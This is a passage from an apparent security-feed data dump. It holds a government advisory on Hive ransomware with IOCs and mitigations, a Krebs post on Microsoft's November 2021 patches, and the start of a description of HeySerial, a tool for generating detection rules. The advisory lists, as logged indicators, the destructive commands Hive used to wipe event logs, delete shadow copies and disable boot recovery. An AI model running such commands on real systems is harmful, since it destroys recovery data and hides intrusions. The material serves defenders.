payments, according to FBI information. Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks. From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH).\n\nThe method of initial intrusion will depend on which affiliate targets the network. Hive actors have gained initial access to victim networks by using single factor logins via Remote Desktop Protocol (RDP), virtual private networks (VPNs), and other remote network connection protocols [[T1133](<https://attack.mitre.org/versions/v12/techniques/T1133/>)]. In some cases, Hive actors have bypassed multifactor authentication (MFA) and gained access to FortiOS servers by exploiting Common Vulnerabilities and Exposures (CVE) [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>). This vulnerability enables a malicious cyber actor to log in without a prompt for the user\u2019s second authentication factor (FortiToken) when the actor changes the case of the username.\n\nHive actors have also gained initial access to victim networks by distributing phishing emails with malicious attachments [[T1566.001](<https://attack.mitre.org/versions/v12/techniques/T1566/001/>)] and by exploiting the following vulnerabilities against Microsoft Exchange servers [[T1190](<https://attack.mitre.org/versions/v12/techniques/T1190/>)]:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) \\- Microsoft Exchange Server Security Feature Bypass Vulnerability\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability\n * [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) \\- Microsoft Exchange Server Privilege Escalation Vulnerability\n\nAfter gaining access, Hive ransomware attempts to evade detention by executing processes to:\n\n * Identify processes related to backups, antivirus/anti-spyware, and file copying and then terminating those processes to facilitate file encryption [[T1562](<https://attack.mitre.org/versions/v12/techniques/T1562/001/>)].\n * Stop the volume shadow copy services and remove all existing shadow copies via vssadmin on command line or via PowerShell [[T1059](<https://attack.mitre.org/versions/v12/techniques/T1059/>)] [[T1490](<https://attack.mitre.org/versions/v12/techniques/T1490/>)].\n * Delete Windows event logs, specifically the System, Security and Application logs [[T1070](<https://attack.mitre.org/versions/v12/techniques/T1070/>)].\n\nPrior to encryption, Hive ransomware removes virus definitions and disables all portions of Windows Defender and other common antivirus programs in the system registry [[T1112](<https://attack.mitre.org/versions/v12/techniques/T1112/>)].\n\nHive actors exfiltrate data likely using a combination of Rclone and the cloud storage service Mega.nz [[T1537](<https://attack.mitre.org/versions/v12/techniques/T1537/>)]. In addition to its capabilities against the Microsoft Windows operating system, Hive ransomware has known variants for Linux, VMware ESXi, and FreeBSD.\n\nDuring the encryption process, a file named *.key (previously *.key.*) is created in the root directory (C:\\ or /root/). Required for decryption, this key file only exists on the machine where it was created and cannot be reproduced. The ransom note, HOW_TO_DECRYPT.txt is dropped into each affected directory and states the *.key file cannot be modified, renamed, or deleted, otherwise the encrypted files cannot be recovered [[T1486](<https://attack.mitre.org/versions/v12/techniques/T1486/>)]. The ransom note contains a \u201csales department\u201d .onion link accessible through a TOR browser, enabling victim organizations to contact the actors through a live chat panel to discuss payment for their files. However, some victims reported receiving phone calls or emails from Hive actors directly to discuss payment.\n\nThe ransom note also threatens victims that a public disclosure or leak site accessible on the TOR site, \u201cHiveLeaks\u201d, contains data exfiltrated from victim organizations who do not pay the ransom demand (see figure 1 below). Additionally, Hive actors have used anonymous file sharing sites to disclose exfiltrated data (see table 1 below).\n\n![](/sites/default/files/publications/How%20to%20Decrypt.png)\n\n_Figure 1: Sample Hive Ransom Note_\n\n_Table 1: Anonymous File Sharing Sites Used to Disclose Data_\n\nhttps://anonfiles[.]com \n \n--- \n \nhttps://mega[.]nz \n \nhttps://send.exploit[.]in \n \nhttps://ufile[.]io \n \nhttps://www.sendspace[.]com \n \nhttps://privatlab[.]net \n \nhttps://privatlab[.]com \n \nOnce the victim organization contacts Hive actors on the live chat panel, Hive actors communicate the ransom amount and the payment deadline. Hive actors negotiate ransom demands in U.S. dollars, with initial amounts ranging from several thousand to millions of dollars. Hive actors demand payment in Bitcoin.\n\nHive actors have been known to reinfect\u2014with either Hive ransomware or another ransomware variant\u2014the networks of victim organizations who have restored their network without making a ransom payment.\n\n#### **Indicators of Compromise**\n\nThreat actors have leveraged the following IOCs during Hive ransomware compromises. Note: Some of these indicators are legitimate applications that Hive threat actors used to aid in further malicious exploitation. FBI, CISA, and HHS recommend removing any application not deemed necessary for day-to-day operations. See tables 2\u20133 below for IOCs obtained from FBI threat response investigations as recently as November 2022.\n\n_Table 2: Known IOCs as of November 2022_\n\nKnown IOCs - Files \n \n--- \n \nHOW_TO_DECRYPT.txt typically in directories with encrypted files \n \n*.key typically in the root directory, i.e., C:\\ or /root \n \nhive.bat \n \nshadow.bat \n \nasq.r77vh0[.]pw - Server hosted malicious HTA file \n \nasq.d6shiiwz[.]pw - Server referenced in malicious regsvr32 execution \n \nasq.swhw71un[.]pw - Server hosted malicious HTA file \n \nasd.s7610rir[.]pw - Server hosted malicious HTA file \n \nWindows_x64_encrypt.dll \n \nWindows_x64_encrypt.exe \n \nWindows_x32_encrypt.dll \n \nWindows_x32_encrypt.exe \n \nLinux_encrypt \n \nEsxi_encrypt \n \nKnown IOCs \u2013 Events \n \nSystem, Security and Application Windows event logs wiped \n \nMicrosoft Windows Defender AntiSpyware Protection disabled \n \nMicrosoft Windows Defender AntiVirus Protection disabled \n \nVolume shadow copies deleted \n \nNormal boot process prevented \n \nKnown IOCs \u2013 Logged Processes \n \nwevtutil.exe cl system \n \nwevtutil.exe cl security \n \nwevtutil.exe cl application \n \nvssadmin.exe delete shadows /all /quiet \n \nwmic.exe SHADOWCOPY /nointeractive \n \nwmic.exe shadowcopy delete \n \nbcdedit.exe /set {default} bootstatuspolicy ignoreallfailures \n \nbcdedit.exe /set {default} recoveryenabled no \n \n_Table 3: Potential IOC IP Addresses as of November 2022_ Note: Some of these observed IP addresses are more than a year old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action like blocking.\n\nPotential IOC IP Addresses for Compromise or Exfil: \n \n--- \n \n84.32.188[.]57\n\n| \n\n84.32.188[.]238 \n \n93.115.26[.]251\n\n| \n\n185.8.105[.]67 \n \n181.231.81[.]239\n\n| \n\n185.8.105[.]112 \n \n186.111.136[.]37\n\n| \n\n192.53.123[.]202 \n \n158.69.36[.]149\n\n| \n\n46.166.161[.]123 \n \n108.62.118[.]190\n\n| \n\n46.166.161[.]93 \n \n185.247.71[.]106\n\n| \n\n46.166.162[.]125 \n \n5.61.37[.]207\n\n| \n\n46.166.162[.]96 \n \n185.8.105[.]103\n\n| \n\n46.166.169[.]34 \n \n5.199.162[.]220\n\n| \n\n93.115.25[.]139 \n \n5.199.162[.]229\n\n| \n\n93.115.27[.]148 \n \n89.147.109[.]208\n\n| \n\n83.97.20[.]81 \n \n5.61.37[.]207\n\n| \n\n5.199.162[.]220 \n \n5.199.162[.]229;\n\n| \n\n46.166.161[.]93 \n \n46.166.161[.]123;\n\n| \n\n46.166.162[.]96 \n \n46.166.162[.]125\n\n| \n\n46.166.169[.]34 \n \n83.97.20[.]81\n\n| \n\n84.32.188[.]238 \n \n84.32.188[.]57\n\n| \n\n89.147.109[.]208 \n \n93.115.25[.]139;\n\n| \n\n93.115.26[.]251 \n \n93.115.27[.]148\n\n| \n\n108.62.118[.]190 \n \n158.69.36[.]149/span>\n\n| \n\n181.231.81[.]239 \n \n185.8.105[.]67\n\n| \n\n185.8.105[.]103 \n \n185.8.105[.]112\n\n| \n\n185.247.71[.]106 \n \n186.111.136[.]37\n\n| \n\n192.53.123[.]202 \n \n#### **MITRE ATT&CK TECHNIQUES**\n\nSee table 4 for all referenced threat actor tactics and techniques listed in this advisory.\n\nTable 4: Hive Actors ATT&CK Techniques for Enterprise\n\n_Initial Access_ \n \n--- \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nExternal Remote Services\n\n| \n\n[T1133](<https://attack.mitre.org/versions/v12/techniques/T1133/>)\n\n| \n\nHive actors gain access to victim networks by using single factor logins via RDP, VPN, and other remote network connection protocols. \n \nExploit Public-Facing Application\n\n| \n\n[T1190](<https://attack.mitre.org/versions/v12/techniques/T1190/>)\n\n| \n\nHive actors gain access to victim network by exploiting the following Microsoft Exchange vulnerabilities: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-42321. \n \nPhishing\n\n| \n\n[T1566.001](<https://attack.mitre.org/versions/v12/techniques/T1566/001/>)\n\n| \n\nHive actors gain access to victim networks by distributing phishing emails with malicious attachments. \n \n_Execution_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nCommand and Scripting Interpreter\n\n| \n\n[T1059](<https://attack.mitre.org/versions/v12/techniques/T1059/>)\n\n| \n\nHive actors looks to stop the volume shadow copy services and remove all existing shadow copies via vssadmin on command line or PowerShell. \n \n_Defense Evasion_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nIndicator Removal on Host\n\n| \n\n[T1070](<https://attack.mitre.org/versions/v12/techniques/T1070/>)\n\n| \n\nHive actors delete Windows event logs, specifically, the System, Security and Application logs. \n \nModify Registry\n\n| \n\n[T1112](<https://attack.mitre.org/versions/v12/techniques/T1112/>)\n\n| \n\nHive actors set registry values for DisableAntiSpyware and DisableAntiVirus to 1. \n \nImpair Defenses\n\n| \n\n[T1562](<https://attack.mitre.org/versions/v12/techniques/T1562/001/>)\n\n| \n\nHive actors seek processes related to backups, antivirus/anti-spyware, and file copying and terminates those processes to facilitate file encryption. \n \n_Exfiltration_ \n \nTechnique Title\n\n| \n\nID\n\n| \n\nUse \n \nTransfer Data to Cloud Account\n\n| \n\n[T1537](<https://attack.mitre.org/versions/v12/techniques/T1537/>)\n\n| \n\nHive actors exfiltrate data from victims, using a possible combination of Rclone and the cloud storage service Mega.nz. \n \n_Impact_ \n \nTechnique Title\n\n| \n\n| \n\nUse \n \nData Encrypted for Impact\n\n| \n\n[T1486](<https://attack.mitre.org/versions/v12/techniques/T1486/>)\n\n| \n\nHive actors deploy a ransom note HOW_TO_DECRYPT.txt into each affected directory which states the *.key file cannot be modified, renamed, or deleted, otherwise the encrypted files cannot be recovered. \n \nInhibit System Recovery\n\n| \n\n[T1490](<https://attack.mitre.org/versions/v12/techniques/T1490/>)\n\n| \n\nHive actors looks to stop the volume shadow copy services and remove all existing shadow copies via vssadmin via command line or PowerShell. \n \n### Mitigations\n\nFBI, CISA, and HHS recommend organizations, particularly in the HPH sector, implement the following to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Hive ransomware:\n\n * Verify Hive actors no longer have access to the network.\n * Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). Consider leveraging a centralized patch management system to automate and expedite the process.\n * Require [phishing-resistant MFA](<https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf>) for as many services as possible\u2014particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.\n * If used, secure and monitor RDP. \n * Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure.\n * After assessing risks, if you deem RDP operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse.\n * If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.\n * Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.\n * Be sure to properly configure devices and enable security features.\n * Disable ports and protocols not used for business purposes, such as RDP Port 3389/TCP.\n * Maintain offline backups of data, and regularly maintain backup and restoration. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n * Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure. Ensure your backup data is not already infected.,\n * Monitor cyber threat reporting regarding the publication of compromised VPN login credentials and change passwords/settings if applicable.\n * Install and regularly update anti-virus or anti-malware software on all hosts.\n * Enable PowerShell Logging including module logging, script block logging and transcription.\n * Install an enhanced monitoring tool such as Sysmon from Microsoft for increased logging.\n * Review the following additional resources. \n * The joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.\n * The Cybersecurity and Infrastructure Security Agency-Multi-State Information Sharing & Analysis Center [Joint Ransomware Guide](<https://www.cisa.gov/stopransomware/ransomware-guide>) covers additional best practices and ways to prevent, protect, and respond to a ransomware attack.\n * [StopRansomware.gov](<https://www.cisa.gov/stopransomware>) is the U.S. Government\u2019s official one-stop location for resources to tackle ransomware more effectively.\n\nIf your organization is impacted by a ransomware incident, FBI, CISA, and HHS recommend the following actions.\n\n * **Isolate the infected system**. Remove the infected system from all networks, and disable the computer\u2019s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected.\n * **Turn off other computers and devices**. Power-off and segregate (i.e., remove from the network) the infected computer(s). Power-off and segregate any other computers or devices that share a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering-off and segregating infected computers and computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists.\n * **Secure your backups**. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware.\n\nIn addition, FBI, CISA, and HHS urge all organizations to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.\n\n#### **Preparing for Cyber Incidents**\n\n * **Review the security posture of third-party vendors and those interconnected with your organization**. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.\n * **Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs** under an established security policy.\n * **Document and monitor external remote connections**. Organizations should document approved solutions for remote management and maintenance, and immediately investigate if an unapproved solution is installed on a workstation.\n * **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).\n\n#### **Identity and Access Management**\n\n * **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with [National Institute of Standards and Technology (NIST) standards](<https://pages.nist.gov/800-63-3/>) for developing and managing password policies. \n * Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n * Store passwords in hashed format using industry-recognized password managers.\n * Add password user \u201csalts\u201d to shared login credentials.\n * Avoid reusing passwords.\n * Implement multiple failed login attempt account lockouts.\n * Disable password \u201chints.\u201d\n * Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised. \nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher.\n * Require administrator credentials to install software.\n * **Require phishing-resistant multifactor authentication** for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n * **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n * **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege.\n * **Implement time-based access for accounts set at the admin level and higher**. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task. \n\n#### **Protective Controls and Architecture**\n\n * **Segment networks** to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n * **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool**. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n * Install, regularly update, and enable real time detection for antivirus software on all hosts.\n\nVulnerability and Configuration Management\n\n * **Consider adding an email banner to emails** received from outside your organization.\n * **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n * **Ensure devices are properly configured and that security features are enabled**. \n * **Restrict Server Message Block (SMB) Protocol within the network to only access necessary servers and remove or disable outdated versions of SMB** (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.\n\n#### **REFERENCES**\n\n * [Stopransomware.gov](<http://www.stopransomware.gov/>) is a whole-of-government approach that gives one central location for ransomware resources and alerts.\n * Resource to mitigate a ransomware attack: [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C.pdf>).\n * No-cost cyber hygiene services: [Cyber Hygiene Services](<https://www.cisa.gov/cyber-hygiene-services>) and [Ransomware Readiness Assessment](<https://github.com/cisagov/cset/>).\n\n#### **INFORMATION REQUESTED**\n\nThe FBI, CISA, and HHS do not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Paying the ransom also does not guarantee that a victim\u2019s files will be recovered. However, the FBI, CISA, and HHS understand that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees, and customers. Regardless of whether you or your organization decide to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to your [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>), or to CISA at [report@cisa.gov](<mailto:report@cisa.gov>) or (888) 282-0870. Doing so provides investigators with the critical information they need to track ransomware attackers, hold them accountable under US law, and prevent future attacks. \n\nThe FBI may seek the following information that you determine you can legally share, including:\n\n * Recovered executable files\n * Live random access memory (RAM) capture\n * Images of infected systems\n * Malware samples\n * IP addresses identified as malicious or suspicious\n * Email addresses of the attackers\n * A copy of the ransom note\n * Ransom amount\n * Bitcoin wallets used by the attackers\n * Bitcoin wallets used to pay the ransom\n * Post-incident forensic reports\n\n#### DISCLAIMER\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.\n\n### Revisions\n\nInitial Version: November 17, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-25T12:00:00", "type": "ics", "title": "#StopRansomware: Hive Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-42321"], "modified": "2022-11-25T12:00:00", "id": "AA22-321A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-321a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-11-26T17:27:08", "description": "**Microsoft Corp.** today released updates to quash at least 55 security bugs in its **Windows** operating systems and other software. Two of the patches address vulnerabilities that are already being used in active attacks online, and four of the flaws were disclosed publicly before today -- potentially giving adversaries a head start in figuring out how to exploit them.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2021/07/windupate.png)\n\nAmong the zero-day bugs is [CVE-2021-42292](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42292>), a "security feature bypass" problem with **Microsoft Excel versions 2013-2021** that could allow attackers to install malicious code just by convincing someone to open a booby-trapped Excel file (Microsoft says Mac versions of Office are also affected, but several places are reporting that Office for Mac security updates aren't available yet).\n\nMicrosoft's revised, more sparse security advisories don't offer much detail on what exactly is being bypassed in Excel with this flaw. But **Dustin Childs **over at **Trend Micro's Zero Day Initiative** [says](<https://www.zerodayinitiative.com/blog/2021/11/9/the-november-2021-security-update-review>) the vulnerability is likely due to loading code that should be limited by a user prompt -- such as a warning about external content or scripts -- but for whatever reason that prompt does not appear, thus bypassing the security feature.\n\nThe other critical flaw patched today that's already being exploited in the wild is [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321>), yet another zero-day in **Microsoft Exchange Server**. You may recall that earlier this year a majority of the world's organizations running Microsoft Exchange Servers were [hit with four zero-day attacks that let thieves install backdoors and siphon email](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>).\n\nAs Exchange zero-days go, CVE-2021-42321 appears somewhat mild by comparison. Unlike the four zero-days involved in the mass compromise of Exchange Server systems earlier this year, CVE-2021-42321 requires the attacker to be already authenticated to the target's system. Microsoft has published a blog post/FAQ about the Exchange zero-day [here](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169>).\n\nTwo of the vulnerabilities that were disclosed prior to today's patches are [CVE-2021-38631](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38631>) and [CVE-2021-41371](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41371>). Both involve weaknesses in Microsoft's **Remote Desktop Protocol** (RDP, Windows' built-in remote administration tool) running on Windows 7 through Windows 11 systems, and on Windows Server 2008-2019 systems. The flaws let an attacker view the RDP password for the vulnerable system.\n\n"Given the interest that cybercriminals -- especially ransomware initial access brokers -- have in RDP, it is likely that it will be exploited at some point," said **Allan Liska**, senior security architect at **Recorded Future**.\n\nLiska notes this month's patch batch also brings us [CVE-2021-38666](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38666>), which is a Remote Code Execution vulnerability in the Windows RDP Client.\n\n"This is a serious vulnerability, labeled critical by Microsoft," Liska added. "In its Exploitability Assessment section Microsoft has labelled this vulnerability 'Exploitation More Likely.' This vulnerability affects Windows 7 - 11 and Windows Server 2008 - 2019 and should be a high priority for patching."\n\nFor most Windows home users, applying security updates is not a big deal. By default, Windows checks for available updates and is fairly persistent in asking you to install them and reboot, etc. It's a good idea to get in the habit of patching on a monthly basis, ideally within a few days of patches being released.\n\nBut please do not neglect to backup your important files -- before patching if possible. Windows 10 has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. There are also a number of excellent third-party products that make it easy to duplicate your entire hard drive on a regular basis, so that a recent, working image of the system is always available for restore.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nIf you experience any glitches or problems installing patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may offer useful tips or suggestions.\n\nFurther reading:\n\n**SANS Internet Storm Center **has a [rundown on each of the 55 patches released today](<https://isc.sans.edu/forums/diary/Microsoft+November+2021+Patch+Tuesday/28018/>), indexed by exploitability and severity, with links to each advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-09T20:39:07", "type": "krebs", "title": "Microsoft Patch Tuesday, November 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38631", "CVE-2021-38666", "CVE-2021-41371", "CVE-2021-42292", "CVE-2021-42321"], "modified": "2021-11-09T20:39:07", "id": "KREBS:7B6AC3C7BFC3E69830DAE975AA547ADC", "href": "https://krebsonsecurity.com/2021/11/microsoft-patch-tuesday-november-2021-edition/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2023-02-08T15:36:21", "description": "[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96iyLi-WJuKHxzsUe2ew0LLbVkwXkKoWXWpcZ0mRX6YUdBo7uzVq0lxIihLA9awRncMpRG3Pz54Becx4VdqrQLs5gSE0N0eXTFeY3SvASRKmLUj29WSoNXUB9oiczpcdLkgyqQmTBmYpjyy432kXPM87zwjhA7s0hfpa0u5aqBPpNFNzCyggYVI4E/w640-h370/deserialization1.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96iyLi-WJuKHxzsUe2ew0LLbVkwXkKoWXWpcZ0mRX6YUdBo7uzVq0lxIihLA9awRncMpRG3Pz54Becx4VdqrQLs5gSE0N0eXTFeY3SvASRKmLUj29WSoNXUB9oiczpcdLkgyqQmTBmYpjyy432kXPM87zwjhA7s0hfpa0u5aqBPpNFNzCyggYVI4E/s1882/deserialization1.png>)\n\n \n\n\nProgrammatically create hunting rules for deserialization [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) with multiple\n\n * keywords (e.g. cmd.exe)\n * gadget chains (e.g. CommonsCollection)\n * object types (e.g. ViewState, Java, Python Pickle, PHP)\n * encodings (e.g. Base64, raw)\n * rule types (e.g. Snort, Yara)\n\n \n\n\n### Disclaimer\n\nRules generated by this tool are intended for hunting/research purposes and are not designed for high fidelity/blocking purposes.\n\nPlease _test thoroughly_ before deploying to any production systems.\n\nThe Yara rules are primarily intended for scanning web server logs. Some of the \"object prefixes\" are only 2 bytes long, so they can make large scans a bit slow. _(Translation: please don't drop them all into VT Retrohunt.)_\n\n### Usage\n\nHelp: `python3 heyserial.py -h`\n\nExamples:\n \n \n python3 heyserial.py -c 'ExampleChain::condition1+condition2' -t JavaObj python3 heyserial.py -k cmd.exe whoami 'This file cannot be run in DOS mode' python3 heyserial.py -k Process.Start -t NETViewState -e base64 \"base64+utf16le\" \n\n# Utils\n\n### utils/checkyoself.py\n\nThis is a tool to automate bulk testing of Snort and Yara rules on a variety of sample files.\n\nUsage: `python3 checkyoself.py [-y rules.yara] [-s rules.snort] [-o file_output_prefix] [--matches] [--misses] -d malware.exe malware.pcap`\n\nExamples: `python3 checkyoself.py -y rules/javaobj -s rules/javaobj -d payloads/javaobj pcaps --misses -o java_misses`\n\n### utils/generate_payloads.ps1\n\nYSoSerial.NET v1.34 payload generation. Run on Windows from the ./utils directory.\n\n * Source: <https://github.com/pwntester/ysoserial.net>\n * License: ysoserial.net_LICENSE.txt\n\n### utils/generate_payloads.sh\n\nYSoSerial payload generation. Run on Linux from the ./utils directory.\n\n * Source: <https://github.com/frohoff/ysoserial>\n * License: ysoserial_LICENSE.txt\n\n### utils/install_snort.sh\n\nInstalling Snort on a Debian based system was a bit finnicky for me, so I wrote my install notes here.\n\n_Use at your own risk _in a VM_ that _you have snapshotted recently_._\n\n### utils/server.py\n\nSimple Python script that runs an HTTP server on 127.0.0.1:12345 and accepts POST requests.\n\nHandy for generating test PCAPs.\n\n# License\n\nCopyright (C) 2021 Alyssa Rahman, Mandiant, Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at: [package root]/LICENSE.txt Unless required by applicable law or agreed to in writing, software [distributed](<https://www.kitploit.com/search/label/Distributed> \"distributed\" ) under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\n# Contributing\n\nCheck out the Developers' guide (DEVELOPERS.md) for more details on extending HeySerial!\n\n# Prior Work/Related Resources\n\nTools\n\n * [Deserialization-Cheat-Sheet](<https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet> \"Deserialization-Cheat-Sheet\" ) \u2013 @GrrrDog\n * [Ysoserial](<https://github.com/frohoff/ysoserial> \"Ysoserial\" ) \\- @frohoff\n * [MarshalSec](<https://github.com/frohoff/marshalsec> \"MarshalSec\" ) \\- @frohoff\n * [Ysoserial (forked)](<https://github.com/wh1t3p1g/ysoserial> \"Ysoserial \$forked\$\" ) \\- @wh1t3p1g\n * 